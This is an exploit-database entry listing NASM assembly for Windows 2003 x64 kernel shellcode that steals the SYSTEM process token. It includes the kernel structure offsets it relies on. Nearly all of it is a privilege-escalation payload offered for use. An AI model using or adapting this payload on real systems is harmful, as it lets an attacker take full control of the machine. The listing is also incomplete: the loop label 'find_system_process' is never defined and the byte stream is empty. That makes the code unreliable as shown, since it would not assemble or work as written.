win2003/x64 - Token Stealing shellcode - 59 bytes

ID 1337DAY-ID-24106
Type zdt
Reporter Fitzl Csaba
Modified 2015-08-20T00:00:00


Exploit for win64 platform in category shellcode

                                            ;token stealing shellcode Win 2003 x64
;based on the widely available x86 version
;syntax for NASM
;Author: Csaba Fitzl, @theevilbit
;important structures and offsets;
;kd> dt -r1 nt!_TEB
;   +0x110 SystemReserved1  : [54] Ptr64 Void
;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
;kd> dt -r1 nt!_KTHREAD
;   +0x048 ApcState         : _KAPC_STATE
;     +0x000 ApcListHead      : [2] _LIST_ENTRY
;     +0x020 Process          : Ptr64 _KPROCESS
;kd> dt -r1 nt!_EPROCESS
;   +0x0d8 UniqueProcessId  : Ptr64 Void
;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
;     +0x000 Flink            : Ptr64 _LIST_ENTRY
;     +0x008 Blink            : Ptr64 _LIST_ENTRY
;  +0x160 Token            : _EX_FAST_REF
;     +0x000 Object           : Ptr64 Void
;     +0x000 RefCnt           : Pos 0, 4 Bits
;     +0x000 Value            : Uint8B
global start
section .text
mov     rax, [gs:0x188]         ;Get current ETHREAD in
mov     rax, [rax+0x68]         ;Get current EPROCESS address
mov     rcx, rax                ;Copy current EPROCESS address to RCX
mov     rax, [rax+0xe0]         ;Next EPROCESS ActiveProcessLinks.Flink
sub     rax, 0xe0               ;Go to the beginning of the EPROCESS structure
mov     r9 , [rax+0xd8]         ;Copy PID to R9
cmp     r9 , 0x4                ;Compare R9 to SYSTEM PID (=4)
jnz short find_system_process   ;If not SYSTEM got to next EPROCESS
mov     rdx, [rax+0x160]        ;Copy SYSTEM process token address to RDX
mov     [rcx+0x160], rdx        ;Steal token with overwriting our current process's token address
retn    0x10
;byte stream:

# [2018-02-19]  #